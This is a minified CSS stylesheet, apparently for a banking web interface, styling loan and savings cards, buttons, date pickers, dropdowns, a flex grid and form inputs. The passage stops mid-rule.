.details-btn{background-color:white}.btn-block-card{color:#EA114E !important}.block-loan{width:291px;height:176px;padding:64px 16px 16px;position:relative;background:#fff;background-image:url("/static/image/icon/card-loan-bg.svg");background-repeat:no-repeat;background-position:right 16px bottom 0;border-radius:10px;cursor:pointer;-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1);-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1);box-shadow:0px 8px 15px rgba(124,158,177,0.1)}.block-loan.active{border:1px solid #FFB8C2}.block-loan .card-icon{top:8px;right:8px;position:absolute;display:flex}.block-loan .card-icon img{width:24px;height:24px}.block-loan .card-name{color:#062A46}.block-loan .card-status{margin:4px 0 12px;line-height:20px}.block-loan .status-point{padding:0 5px 2px 0}.block-loan .status-text{color:#9EB3C9;font-size:12px;line-height:20px}.block-loan .card-no{margin-bottom:4px;display:inline-block;cursor:text}.block-loan .card-no .overlay-text{color:#A8B9C6;padding-left:4px}.block-loan .card-balance .overlay-text{color:#9EB3C9;padding-left:4px}.block-saving{width:291px;height:176px;padding:64px 16px 16px;position:relative;background:#fff;background-image:url("/static/image/icon/card-saving-bg.svg");background-repeat:no-repeat;background-position:right 10px bottom 0;border-radius:10px;cursor:pointer;-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1);-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1);box-shadow:0px 8px 15px rgba(124,158,177,0.1)}.block-saving.active{border:1px solid #FFB8C2}.block-saving .card-icon{top:16px;right:16px;position:absolute}.block-saving .card-icon .dots{width:24px;height:24px}.block-saving .card-name{color:#062A46}.block-saving .card-status{margin:4px 0 12px;line-height:20px}.block-saving .status-point{padding:0 5px 2px 0}.block-saving .status-text{color:#9EB3C9;font-size:12px;line-height:20px}.block-saving .card-no{margin-bottom:4px;display:inline-block;cursor:text}.block-saving .card-no .overlay-text{color:#A8B9C6;padding-left:4px}.block-saving .card-balance .overlay-text{color:#9EB3C9;padding-left:4px}.app-btn{cursor:pointer;border:none;outline:none;position:relative;min-width:130px;border-radius:4px;color:#fff;padding:16px;background:#005993;-webkit-transition:background 200ms,background-color 200ms;-moz-transition:background 200ms,background-color 200ms;-o-transition:background 200ms,background-color 200ms;transition:background 200ms,background-color 200ms}.app-btn img{max-height:24px;margin-right:8px;vertical-align:middle}.app-btn.b-wide{min-width:200px}.app-btn.b-small{font-size:14px;font-weight:500;line-height:20px;padding:8px 16px}.app-btn.b-small.b-with-icon{padding:4px 16px}.app-btn.b-medium{font-size:16px;font-weight:500;line-height:16px}.app-btn.b-medium.b-with-icon{padding:12px 16px}.app-btn.b-large{font-size:18px;font-weight:500;line-height:24px}.app-btn.b-large.b-with-icon{padding:12px 16px}.app-btn.b-danger{background-color:#EA114E}.app-btn.b-outline{-webkit-box-shadow:inset 0 0 0 1px #005993;-moz-box-shadow:inset 0 0 0 1px #005993;box-shadow:inset 0 0 0 1px #005993}.app-btn.b-outline.b-overlay,.app-btn.b-outline.b-disabled{-webkit-box-shadow:inset 0 0 0 1px #9EB3C9;-moz-box-shadow:inset 0 0 0 1px #9EB3C9;box-shadow:inset 0 0 0 1px #9EB3C9}.app-btn.b-empty,.app-btn.b-outline{color:#005993;background:transparent}.app-btn.b-empty.b-overlay,.app-btn.b-outline.b-overlay{color:#9EB3C9}.app-btn.b-empty.b-overlay:hover,.app-btn.b-outline.b-overlay:hover{color:#005993}.app-btn.b-empty.b-danger,.app-btn.b-outline.b-danger{color:#EA114E;-webkit-box-shadow:inset 0 0 0 1px #EA114E;-moz-box-shadow:inset 0 0 0 1px #EA114E;box-shadow:inset 0 0 0 1px #EA114E}.app-btn.b-overlay img{filter:grayscale(1);opacity:.5}.app-btn.b-overlay:hover img{filter:inherit;opacity:inherit}.app-btn.b-disabled{color:#9EB3C9;cursor:not-allowed;opacity:.6;background:#E7EEF3}.app-btn.b-disabled.b-empty{background:#fff}.app-btn.b-disabled img{filter:grayscale(1);opacity:.5}.app-btn.b-width-auto{min-width:auto}.vt-carousel{position:relative}.vt-carousel .slick-arrow{position:absolute;top:50%;transform:translateY(-50%);z-index:99}.vt-carousel .slick-arrow.slick-prev{left:0}.vt-carousel .slick-arrow.slick-next{right:0;transform:translateY(-50%) rotateZ(180deg)}.vt-carousel.dots-outside .slick-dots{position:relative}.vt-carousel.arrows-outside .slick-arrow.slick-prev{left:0;transform:translate(-100%, -50%)}.vt-carousel.arrows-outside .slick-arrow.slick-next{right:0;transform:translate(100%, -50%) rotateZ(180deg)}.vt-carousel .slick-dots{bottom:0;display:flex;margin:16px;width:auto}.vt-carousel .slick-dots li{margin:0;width:auto;height:auto}.vt-carousel .slick-dots li .vt-carousel__dot{width:6px;height:6px;border-radius:6px;background-color:#C9D9EA;-webkit-transition:background-color 0.3s,width 0.3s;-moz-transition:background-color 0.3s,width 0.3s;-o-transition:background-color 0.3s,width 0.3s;transition:background-color 0.3s,width 0.3s}.vt-carousel .slick-dots li.slick-active .vt-carousel__dot{background-color:#005993;width:16px}.vt-carousel .slick-dots li:not(:first-child){margin-left:4px}.terms-checkbox{width:fit-content;cursor:pointer;display:flex;align-items:baseline}.terms-checkbox__txt{font-size:16px;font-weight:400;line-height:24px}.terms-checkbox__ic{position:relative;font-size:16px;font-weight:400;line-height:24px;margin-right:8px}.collapse-wrapper{background-color:#fff;padding:32px;border-radius:10px}.collapse-wrapper .panel{border-bottom:1px solid #C9D9EA;margin-bottom:16px}.collapse-wrapper .panel-control{display:flex;flex-direction:row;justify-content:space-between;align-items:center;padding-bottom:16px}.collapse-wrapper .panel-control:hover{cursor:pointer}.collapse-wrapper .panel-content{padding-bottom:24px}.date-picker-range-input{width:100%;height:48px;border:1px solid #C9D9EA;position:relative;padding:11px 16px;background-color:#fff}.date-picker-range-input:focus,.date-picker-range-input.active,.date-picker-range-input:active{border:1px solid #005993;outline:none}.date-picker-range-input__input{height:100%;width:100%;border:none;outline:none;color:#062A46;font-weight:500;font-size:16px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;padding-right:24px}.date-picker-range-input .input-button-group{position:absolute;right:16px;width:24px;top:11px;height:24px;display:flex;align-items:center;justify-content:center;cursor:pointer}.input-error{border:1px solid #EA114E;color:#EA114E}.input-error>input::placeholder{color:#EA114E}.label-error{padding-top:5px;color:#EA114E;font-size:14px}.date-picker-nav--button{position:absolute;top:0px}.date-picker-nav--button.btn-next{right:40px}.date-picker-nav--button.btn-back{left:-7px}.date-picker-day-cell{width:32px;height:32px;display:flex;align-items:center;justify-content:center;color:#062A46;font-size:14px}.date-picker-info--footer{display:flex;justify-content:flex-end}.date-picker-info--footer-btn-submit{outline:none;width:130px;height:36px;border-radius:4px;background-color:#005993;color:#fff;padding:0px;cursor:pointer;border:none}.date-picker-range{display:flex;font-family:"SVN-Gilroy";width:100%;position:relative;flex-flow:column}.date-picker-range .date-picker-main{position:absolute;left:0;box-shadow:0px 4px 30px rgba(0,89,147,0.18);border-radius:8px;padding:16px 16px;background-color:#fff;z-index:1}.date-picker-range .date-picker-main.up{bottom:64px}.date-picker-range .date-picker-main.down{top:64px}.date-picker-range .DayPicker{width:473px !important}.date-picker-range .DayPicker_weekHeader{width:238px;z-index:1}.date-picker-range .DayPicker_transitionContainer{width:473px !important;background-color:transparent;min-height:266px}.date-picker-range .DayPicker_transitionContainer .CalendarMonth{padding:0px !important;margin-right:24px}.date-picker-range .DayPicker_transitionContainer .CalendarMonth:nth-child(2){margin-right:0px}.date-picker-range .DayPicker_transitionContainer .CalendarMonthGrid{left:0px}.date-picker-range .DayPicker_transitionContainer .CalendarMonth_caption{font-size:16px;font-weight:normal;padding-bottom:48px;padding-top:0px;font-weight:500;line-height:24px}.date-picker-range .DayPicker_weekHeader{padding:0px !important;top:40px}.date-picker-range .DayPicker_weekHeader:first-child{left:-8px !important}.date-picker-range .DayPicker_weekHeader:last-child{right:34px;left:auto !important}.date-picker-range .DayPicker_weekHeader .DayPicker_weekHeader_li{width:32px !important;color:#4B6477;font-weight:500;font-size:14px;line-height:18px}.date-picker-range .CalendarDay{border:none;width:32px;height:32px}.date-picker-range .CalendarDay__default:not(.CalendarDay__selected_span):hover .date-picker-day-cell{color:#005993}.date-picker-range .CalendarDay__selected_span{background:#F4F8FB;color:#062A46;border:none}.date-picker-range .CalendarDay__selected_start{border-top-left-radius:50%;border-bottom-left-radius:50%;background-color:#F4F8FB}.date-picker-range .CalendarDay__selected_start .date-picker-day-cell{border:1px solid #005993;border-radius:100%;color:#005993;background-color:#fff}.date-picker-range .CalendarDay__selected:not(.CalendarDay__selected_start){border-top-right-radius:50%;border-bottom-right-radius:50%;background-color:#F4F8FB}.date-picker-range .CalendarDay__selected:not(.CalendarDay__selected_start) .date-picker-day-cell{border:1px solid #005993;border-radius:100%;color:#005993;background-color:#fff}.date-picker-range .CalendarDay__hovered_span{background:#F4F8FB}.date-picker-range .CalendarDay__hovered_span:hover{border-top-right-radius:50%;border-bottom-right-radius:50%;background-color:#F4F8FB}.date-picker-range .CalendarDay__hovered_span:hover .date-picker-day-cell{border:1px solid #005993;background:#fff;color:#005993;border-radius:100%}.date-picker-range .CalendarDay__default:not(.CalendarDay__selected):not(.CalendarDay__selected_start):not(.CalendarDay__selected_end):not(.CalendarDay__hovered_span):not(.CalendarDay__selected_span):hover{background-color:#fff}.date-picker-range .CalendarDay__highlighted_calendar .date-highlight-radiant{background:linear-gradient(270deg, #fff -.55%, rgba(255,255,255,0) 12.2%),#F4F8FB}.date-picker-range .CalendarDay__today .date-picker-day-cell{color:#79CCF3;text-decoration:underline}.CalendarDay__blocked_out_of_range .date-picker-day-cell{color:#9EB3C9}.CalendarMonth_table td{width:32px;height:32px;padding:0}.date-picker-range.vertical .DayPicker{width:224px !important}.date-picker-range.vertical .DayPicker_transitionContainer{height:500;width:100% !important;padding-bottom:32px;box-sizing:content-box}.date-picker-range.vertical .DayPicker_transitionContainer .CalendarMonth{margin-right:0}.date-picker-range.vertical .CalendarMonthGrid{width:100% !important}.date-picker-range.vertical .DayPicker_weekHeader:first-child{left:-8px !important}.date-picker-range.vertical .DayPicker_weekHeader:last-child{right:auto;left:auto !important;margin-left:0 !important}.date-picker-range.vertical .date-picker-nav--button.btn-next{right:0px}.date-picker{display:block;font-family:"SVN-Gilroy";position:relative}.date-picker .date-picker-main{position:absolute;left:0;box-shadow:0px 4px 30px rgba(0,89,147,0.18);border-radius:8px;padding:16px 16px;background-color:#fff;z-index:12}.date-picker .date-picker-main.up{bottom:64px}.date-picker .date-picker-main.down{top:64px}.date-picker .DayPicker{width:224px !important}.date-picker .DayPicker .DayPicker_weekHeader{width:224px;top:40px;left:-11px !important;padding:0px !important}.date-picker .DayPicker .DayPicker_weekHeader .DayPicker_weekHeader_li{width:32px !important;color:#4B6477;font-weight:500;font-size:14px;line-height:18px}.date-picker .DayPicker .CalendarMonth{padding:0px !important}.date-picker .DayPicker .DayPicker_transitionContainer{width:224px !important;min-height:266px}.date-picker .DayPicker .CalendarMonthGrid__horizontal{left:0px}.date-picker .DayPicker .DayPicker_focusRegion{width:224px}.date-picker .DayPicker .CalendarMonth_caption{font-size:16px;font-weight:normal;padding-bottom:48px;padding-top:0px;font-weight:500;line-height:24px}.date-picker .DayPicker .date-picker-nav--button.btn-next{line-height:0;right:0px}.date-picker .DayPicker .date-picker-nav--button.btn-back{line-height:0;left:0px}.date-picker .DayPicker .CalendarDay{border:none;width:48px;height:48px}.date-picker .DayPicker .CalendarDay__today .date-picker-day-cell{color:#79CCF3;text-decoration:underline}.date-picker .DayPicker .CalendarDay__selected{background-color:#fff}.date-picker .DayPicker .CalendarDay__selected .date-picker-day-cell{border:1px solid #005993;border-radius:100%;color:#005993;background-color:#fff}.date-picker .DayPicker .CalendarDay__default:not(.CalendarDay__selected_span):not(.CalendarDay__blocked_out_of_range):hover .date-picker-day-cell{color:#005993}.date-picker .DayPicker .CalendarDay__selected_span{background:#F4F8FB;color:#062A46;border:none}.date-picker .DayPicker .CalendarDay__default:not(.CalendarDay__selected_span):not(.CalendarDay__blocked_out_of_range):hover{background-color:#fff}.date-picker .DayPicker .CalendarDay__default:not(.CalendarDay__selected_span):not(.CalendarDay__blocked_out_of_range):hover .date-picker-day-cell{color:#005993}.date-picker .date-picker-info--footer-btn-submit{width:80px}.dropdown__list__item{padding:8px 16px;max-width:200px;color:#062A46;cursor:pointer;position:relative}.dropdown__list__item:first-child{border-top:none}.dropdown__list__item.width-auto{max-width:initial}.dropdown__list__item.disabled{cursor:default;opacity:.4}.dropdown__list__item:hover{background-color:#F4F8FB;transition:background-color .1s}.dropdown__list__item:not(:last-child)::after{content:'';position:absolute;bottom:0;left:16px;width:calc(100% - 32px);height:1px;background-color:#E7EEF3}.vt-dropdown{position:relative;display:inline-block}.vt-dropdown__list{display:none;position:absolute;z-index:1;border-radius:4px;-webkit-box-shadow:0px 13px 17px 9px rgba(124,158,177,0.1);-moz-box-shadow:0px 13px 17px 9px rgba(124,158,177,0.1);box-shadow:0px 13px 17px 9px rgba(124,158,177,0.1);background:linear-gradient(180deg, #fff 0%, rgba(255,255,255,0.95) 100%);min-width:184px;padding:8px 0}.vt-dropdown__list.open{display:block}.vt-dropdown__list.width-full{min-width:100%}.vt-dropdown__list.list-position-top{top:0;left:50%;transform:translate(-50%, -100%)}.vt-dropdown__list.list-position-top.list-align-left{left:100%;transform:translate(-100%, -100%)}.vt-dropdown__list.list-position-top.list-align-right{left:0;transform:translate(0, -100%)}.vt-dropdown__list.list-position-bottom{top:100%;left:50%;transform:translateX(-50%)}.vt-dropdown__list.list-position-bottom.list-align-left{left:100%;transform:translateX(-100%)}.vt-dropdown__list.list-position-bottom.list-align-right{left:0;transform:translateX(0)}.vt-dropdown__list.list-position-left{right:100%;top:50%;transform:translateY(-50%)}.vt-dropdown__list.list-position-left.list-align-top{top:0;transform:translateY(0)}.vt-dropdown__list.list-position-left.list-align-bottom{top:inherit;transform:translateY(0);bottom:0}.vt-dropdown__list.list-position-right{left:100%;top:50%;transform:translateY(-50%)}.vt-dropdown__list.list-position-right.list-align-top{top:0;transform:translateY(0)}.vt-dropdown__list.list-position-right.list-align-bottom{top:inherit;transform:translateY(0);bottom:0}.vt-dropdown__list.list-position-center{top:50%;left:50%;transform:translate(-50%, -50%)}.block-item:hover .vt-dropdown__list::after{content:'';position:absolute;bottom:-16px;left:0;width:100%;height:16px;cursor:default}.modal-dropdown .modal-container .modal-content{width:auto;margin:auto;padding:8px 0;min-width:180px;border-radius:4px;pointer-events:none}.modal-dropdown .modal-container .modal-content>div{pointer-events:initial}.modal-dropdown .modal-container .modal-content>div .dropdown__list__item{max-width:none}.balance-horizontal{display:flex}.balance-horizontal .balance-label{color:#9EB3C9}.balance-horizontal>*:not(:first-child){margin-left:32px}.box-content{background:#fff;-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.05);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.05);box-shadow:0px 8px 10px rgba(32,71,101,0.05);border-radius:10px}@keyframes dot-animate{0%,80%,100%{opacity:0}40%{opacity:1}}.box-view{border:1px solid #C9D9EA;background-color:#F4F8FB;padding:11px 16px;min-height:48px;position:relative}.box-view .fake-content{display:inline-block}.box-view.loading{padding-right:44px}.box-view__loading{position:absolute;top:50%;right:16px;transform:translateY(-50%);color:#005993;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-transition:color 150ms;transition:color 150ms;-webkit-align-self:center;-ms-flex-item-align:center;align-self:center;font-size:4px;line-height:1;text-align:center;vertical-align:middle;box-sizing:border-box}.box-view__loading .loading-dot{height:1em;vertical-align:top;width:1em;display:inline-block;border-radius:1em;background-color:currentColor}.box-view__loading .loading-dot:nth-child(1){-webkit-animation:dot-animate 1s ease-in-out 0ms infinite;animation:dot-animate 1s ease-in-out 0ms infinite}.box-view__loading .loading-dot:nth-child(2){margin-left:1em;-webkit-animation:dot-animate 1s ease-in-out 160ms infinite;animation:dot-animate 1s ease-in-out 160ms infinite}.box-view__loading .loading-dot:nth-child(3){margin-left:1em;-webkit-animation:dot-animate 1s ease-in-out 320ms infinite;animation:dot-animate 1s ease-in-out 320ms infinite}.button-group-action{display:flex}.button-group-action .button-action{width:44px;height:44px;border-radius:100%;display:flex;background-color:red;cursor:pointer}.button-group-action .button-action img{margin:auto;width:24px;height:24px}.button-group-action .button-action:not(:first-child){margin-left:16px}.button-group-action .button-action.view{background-color:#1A73AB}.button-group-action .button-action.edit{background-color:#79CCF3}.button-group-action .button-action.delete{background-color:#EA114E}.button-group{display:flex;align-items:center}.button-group .btn-icon{margin-right:8px}.button-group>*{min-width:auto !important}.button-group>*:not(:first-child){margin-left:16px}.button-group>*.ghost{padding:0 8px}.edit-inline{display:inline-block}.edit-inline img{cursor:pointer}.edit-inline .view-mode img{margin-left:8px}.edit-inline .edit-mode{display:flex;align-items:center;padding:4px 0;border-bottom:1px solid #005993}.edit-inline .edit-mode__input{border:none;background-color:transparent;flex:1 0 auto;margin-left:8px;outline:none}.li-item{position:relative;padding-left:12px}.li-item::before{content:' ';position:absolute;top:50%;left:0;transform:translateY(-50%);width:4px;height:4px;background-color:#005993}.status-style.open,.status-style.active,.status-style.declared{color:#4CB944}.status-style.closed,.status-style.lost{color:#EA114E}.empty-transaction{background-color:rgba(244,248,251,0.4);min-height:160px;padding:16px 0;display:flex;align-items:center;justify-content:center;flex-wrap:wrap}.empty-transaction.border{border-top:1px solid #C9D9EA}.empty-transaction__text{max-width:248px;min-width:120px;font-size:12px;line-height:20px;color:#9EB3C9}.empty-transaction__bg{height:100%}.empty-transaction__bg img{height:100%}.cms-flex-col.flex{display:flex}.cms-flex-col.auto-expand{flex:1 1 auto}.cms-flex-col.center{align-items:center;justify-content:center}.cms-flex-col.x-center{justify-content:center}.cms-flex-col.x-right{justify-content:flex-end}.cms-flex-col.y-center{align-items:center}.cms-flex-col.y-top{align-items:flex-start}.cms-flex-col.y-bottom{align-items:flex-end}.cms-flex-col.xs1{flex-basis:calc(100% / 12)}.cms-flex-col.xs-offset1{margin-left:calc(100% / 12)}.cms-flex-col.xs2{flex-basis:calc(100% / 12 * 2)}.cms-flex-col.xs-offset2{margin-left:calc(100% / 12 * 2)}.cms-flex-col.xs3{flex-basis:calc(100% / 12 * 3)}.cms-flex-col.xs-offset3{margin-left:calc(100% / 12 * 3)}.cms-flex-col.xs4{flex-basis:calc(100% / 12 * 4)}.cms-flex-col.xs-offset4{margin-left:calc(100% / 12 * 4)}.cms-flex-col.xs5{flex-basis:calc(100% / 12 * 5)}.cms-flex-col.xs-offset5{margin-left:calc(100% / 12 * 5)}.cms-flex-col.xs6{flex-basis:calc(100% / 12 * 6)}.cms-flex-col.xs-offset6{margin-left:calc(100% / 12 * 6)}.cms-flex-col.xs7{flex-basis:calc(100% / 12 * 7)}.cms-flex-col.xs-offset7{margin-left:calc(100% / 12 * 7)}.cms-flex-col.xs8{flex-basis:calc(100% / 12 * 8)}.cms-flex-col.xs-offset8{margin-left:calc(100% / 12 * 8)}.cms-flex-col.xs9{flex-basis:calc(100% / 12 * 9)}.cms-flex-col.xs-offset9{margin-left:calc(100% / 12 * 9)}.cms-flex-col.xs10{flex-basis:calc(100% / 12 * 10)}.cms-flex-col.xs-offset10{margin-left:calc(100% / 12 * 10)}.cms-flex-col.xs11{flex-basis:calc(100% / 12 * 11)}.cms-flex-col.xs-offset11{margin-left:calc(100% / 12 * 11)}.cms-flex-col.xs12{flex-basis:100%}.cms-flex-col.xs-offset12{margin-left:100%}@media (min-width: 576px){.cms-flex-col.sm1{flex-basis:calc(100% / 12)}.cms-flex-col.sm-offset1{margin-left:calc(100% / 12)}.cms-flex-col.sm2{flex-basis:calc(100% / 12 * 2)}.cms-flex-col.sm-offset2{margin-left:calc(100% / 12 * 2)}.cms-flex-col.sm3{flex-basis:calc(100% / 12 * 3)}.cms-flex-col.sm-offset3{margin-left:calc(100% / 12 * 3)}.cms-flex-col.sm4{flex-basis:calc(100% / 12 * 4)}.cms-flex-col.sm-offset4{margin-left:calc(100% / 12 * 4)}.cms-flex-col.sm5{flex-basis:calc(100% / 12 * 5)}.cms-flex-col.sm-offset5{margin-left:calc(100% / 12 * 5)}.cms-flex-col.sm6{flex-basis:calc(100% / 12 * 6)}.cms-flex-col.sm-offset6{margin-left:calc(100% / 12 * 6)}.cms-flex-col.sm7{flex-basis:calc(100% / 12 * 7)}.cms-flex-col.sm-offset7{margin-left:calc(100% / 12 * 7)}.cms-flex-col.sm8{flex-basis:calc(100% / 12 * 8)}.cms-flex-col.sm-offset8{margin-left:calc(100% / 12 * 8)}.cms-flex-col.sm9{flex-basis:calc(100% / 12 * 9)}.cms-flex-col.sm-offset9{margin-left:calc(100% / 12 * 9)}.cms-flex-col.sm10{flex-basis:calc(100% / 12 * 10)}.cms-flex-col.sm-offset10{margin-left:calc(100% / 12 * 10)}.cms-flex-col.sm11{flex-basis:calc(100% / 12 * 11)}.cms-flex-col.sm-offset11{margin-left:calc(100% / 12 * 11)}.cms-flex-col.sm12{flex-basis:100%}.cms-flex-col.sm-offset12{margin-left:100%}}@media (min-width: 768px){.cms-flex-col.md1{flex-basis:calc(100% / 12)}.cms-flex-col.md-offset1{margin-left:calc(100% / 12)}.cms-flex-col.md2{flex-basis:calc(100% / 12 * 2)}.cms-flex-col.md-offset2{margin-left:calc(100% / 12 * 2)}.cms-flex-col.md3{flex-basis:calc(100% / 12 * 3)}.cms-flex-col.md-offset3{margin-left:calc(100% / 12 * 3)}.cms-flex-col.md4{flex-basis:calc(100% / 12 * 4)}.cms-flex-col.md-offset4{margin-left:calc(100% / 12 * 4)}.cms-flex-col.md5{flex-basis:calc(100% / 12 * 5)}.cms-flex-col.md-offset5{margin-left:calc(100% / 12 * 5)}.cms-flex-col.md6{flex-basis:calc(100% / 12 * 6)}.cms-flex-col.md-offset6{margin-left:calc(100% / 12 * 6)}.cms-flex-col.md7{flex-basis:calc(100% / 12 * 7)}.cms-flex-col.md-offset7{margin-left:calc(100% / 12 * 7)}.cms-flex-col.md8{flex-basis:calc(100% / 12 * 8)}.cms-flex-col.md-offset8{margin-left:calc(100% / 12 * 8)}.cms-flex-col.md9{flex-basis:calc(100% / 12 * 9)}.cms-flex-col.md-offset9{margin-left:calc(100% / 12 * 9)}.cms-flex-col.md10{flex-basis:calc(100% / 12 * 10)}.cms-flex-col.md-offset10{margin-left:calc(100% / 12 * 10)}.cms-flex-col.md11{flex-basis:calc(100% / 12 * 11)}.cms-flex-col.md-offset11{margin-left:calc(100% / 12 * 11)}.cms-flex-col.md12{flex-basis:100%}.cms-flex-col.md-offset12{margin-left:100%}}@media (min-width: 992px){.cms-flex-col.lg1{flex-basis:calc(100% / 12)}.cms-flex-col.lg-offset1{margin-left:calc(100% / 12)}.cms-flex-col.lg2{flex-basis:calc(100% / 12 * 2)}.cms-flex-col.lg-offset2{margin-left:calc(100% / 12 * 2)}.cms-flex-col.lg3{flex-basis:calc(100% / 12 * 3)}.cms-flex-col.lg-offset3{margin-left:calc(100% / 12 * 3)}.cms-flex-col.lg4{flex-basis:calc(100% / 12 * 4)}.cms-flex-col.lg-offset4{margin-left:calc(100% / 12 * 4)}.cms-flex-col.lg5{flex-basis:calc(100% / 12 * 5)}.cms-flex-col.lg-offset5{margin-left:calc(100% / 12 * 5)}.cms-flex-col.lg6{flex-basis:calc(100% / 12 * 6)}.cms-flex-col.lg-offset6{margin-left:calc(100% / 12 * 6)}.cms-flex-col.lg7{flex-basis:calc(100% / 12 * 7)}.cms-flex-col.lg-offset7{margin-left:calc(100% / 12 * 7)}.cms-flex-col.lg8{flex-basis:calc(100% / 12 * 8)}.cms-flex-col.lg-offset8{margin-left:calc(100% / 12 * 8)}.cms-flex-col.lg9{flex-basis:calc(100% / 12 * 9)}.cms-flex-col.lg-offset9{margin-left:calc(100% / 12 * 9)}.cms-flex-col.lg10{flex-basis:calc(100% / 12 * 10)}.cms-flex-col.lg-offset10{margin-left:calc(100% / 12 * 10)}.cms-flex-col.lg11{flex-basis:calc(100% / 12 * 11)}.cms-flex-col.lg-offset11{margin-left:calc(100% / 12 * 11)}.cms-flex-col.lg12{flex-basis:100%}.cms-flex-col.lg-offset12{margin-left:100%}}@media (min-width: 1200px){.cms-flex-col.xl1{flex-basis:calc(100% / 12)}.cms-flex-col.xl-offset1{margin-left:calc(100% / 12)}.cms-flex-col.xl2{flex-basis:calc(100% / 12 * 2)}.cms-flex-col.xl-offset2{margin-left:calc(100% / 12 * 2)}.cms-flex-col.xl3{flex-basis:calc(100% / 12 * 3)}.cms-flex-col.xl-offset3{margin-left:calc(100% / 12 * 3)}.cms-flex-col.xl4{flex-basis:calc(100% / 12 * 4)}.cms-flex-col.xl-offset4{margin-left:calc(100% / 12 * 4)}.cms-flex-col.xl5{flex-basis:calc(100% / 12 * 5)}.cms-flex-col.xl-offset5{margin-left:calc(100% / 12 * 5)}.cms-flex-col.xl6{flex-basis:calc(100% / 12 * 6)}.cms-flex-col.xl-offset6{margin-left:calc(100% / 12 * 6)}.cms-flex-col.xl7{flex-basis:calc(100% / 12 * 7)}.cms-flex-col.xl-offset7{margin-left:calc(100% / 12 * 7)}.cms-flex-col.xl8{flex-basis:calc(100% / 12 * 8)}.cms-flex-col.xl-offset8{margin-left:calc(100% / 12 * 8)}.cms-flex-col.xl9{flex-basis:calc(100% / 12 * 9)}.cms-flex-col.xl-offset9{margin-left:calc(100% / 12 * 9)}.cms-flex-col.xl10{flex-basis:calc(100% / 12 * 10)}.cms-flex-col.xl-offset10{margin-left:calc(100% / 12 * 10)}.cms-flex-col.xl11{flex-basis:calc(100% / 12 * 11)}.cms-flex-col.xl-offset11{margin-left:calc(100% / 12 * 11)}.cms-flex-col.xl12{flex-basis:100%}.cms-flex-col.xl-offset12{margin-left:100%}}.cms-flex{flex:1 1 auto;display:flex}.cms-flex.center{align-items:center;justify-content:center}.cms-flex.x-center{justify-content:center}.cms-flex.x-right{justify-content:flex-end}.cms-flex.x-between{justify-content:space-between}.cms-flex.y-center{align-items:center}.cms-flex.y-top{align-items:flex-start}.cms-flex.y-bottom{align-items:flex-end}.cms-flex.y-stretch{align-items:stretch}.cms-flex.y-baseline{align-items:baseline}.cms-flex__wrap{flex-wrap:wrap}.cms-flex__wrap_reverse{flex-wrap:wrap-reverse}.cms-flex__row{flex-direction:row}.cms-flex__row_reverse{flex-direction:row-reverse}.cms-flex__column{flex-direction:column}.cms-flex__column_reverse{flex-direction:column-reverse}.cms-flex.flex-grow-0{flex-grow:0}.cms-flex.flex-offset-0{margin:0 0px !important}.cms-flex.flex-offset-1{margin:0 -4px !important}.cms-flex.flex-offset-2{margin:0 -8px !important}.cms-flex.flex-offset-3{margin:0 -12px !important}.cms-flex.flex-offset-4{margin:0 -16px !important}.cms-flex.flex-offset-5{margin:0 -20px !important}.cms-flex.flex-offset-6{margin:0 -24px !important}.cms-flex.flex-offset-7{margin:0 -28px !important}.cms-flex.flex-offset-8{margin:0 -32px !important}.cms-flex.flex-offset-9{margin:0 -36px !important}.cms-flex.flex-offset-10{margin:0 -40px !important}.cms-flex.flex-offset-11{margin:0 -44px !important}.cms-flex.flex-offset-12{margin:0 -48px !important}.cms-flex.flex-offset-13{margin:0 -52px !important}.cms-flex.flex-offset-14{margin:0 -56px !important}.input-slider{padding-bottom:24px}.input-slider__container{padding:12px 0}.input-slider__container .rc-slider-mark{top:28px}.input-slider__container .rc-slider-mark-text{color:#9EB3C9;font-size:16px;font-weight:500;line-height:22px}.input-slider__container .rc-slider-mark-text:first-child{transform:translateX(0) !important}.input-slider__container .rc-slider-mark-text:nth-last-child(1){transform:translateX(-100%) !important}.input-slider__container .rc-slider-dot:first-child{left:3px !important}.input-slider__container .rc-slider-dot:nth-last-child(1){left:inherit !important;right:0}.input-slider__container .rc-slider-mark-text-active{color:#062A46}.radio-button-group{display:inline-block;display:flex;align-items:center;flex-wrap:wrap;align-items:baseline}.radio-button-group.medium{min-height:48px}.radio-button-group>*:not(:last-child){margin-right:24px}.input-group{display:flex;flex-direction:row}.input-group button{margin-top:6px}.input-group .hint{color:#EA114E;margin-top:8px}.input-group .hint.normal{color:#9EB3C9}.input-group .input-box{width:100%}.input-group .input-box .wrap-input{flex:1;position:relative;height:fit-content}.input-group .input-box .wrap-input .view-password{position:absolute;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);padding:3px}.input-group .input-box .wrap-input input{width:100%;border:none;background-color:transparent;padding:8px 0;border-bottom:1px solid #9EB3C9;outline:none;border-radius:0}.input-group .input-box .wrap-input input.pass{padding-right:30px}.input-group .input-box .wrap-input input.error{border-color:#EA114E}.input-group .input-box .wrap-input input::placeholder{color:#9EB3C9}.input-group .input-box .wrap-input.outlined .view-password{right:8px;padding:0}.input-group .input-box .wrap-input.outlined input{border:1px solid #C9D9EA;background-color:#fff;padding:13px 16px}.input-group .input-box .wrap-input.outlined input.pass{padding-right:40px}.input-group .input-box .wrap-input.outlined input.error{border-color:#EA114E}.btn-form-inline{border-radius:100%;background:linear-gradient(241.32deg, #14a1fd -117.04%, #015a94 83.82%),#005993;border:none;outline:none;padding:0;min-height:56px;min-width:56px;height:56px;width:56px}.btn-form-inline:disabled{opacity:0.7}.custom-radio,.custom-checkbox{position:relative;flex-direction:row;cursor:pointer}.custom-radio input,.custom-checkbox input{position:absolute;opacity:0;cursor:pointer;height:0;width:0}.custom-checkbox{display:flex;align-items:flex-start}.custom-checkbox img{height:16px;width:16px}.custom-checkbox .check-active{display:none}.custom-checkbox .check-unactive{display:block}.custom-checkbox input:checked ~ .check-active{display:block}.custom-checkbox input:checked ~ .check-unactive{display:none}.custom-radio{display:inline-flex;align-items:flex-start;margin:0}.custom-radio 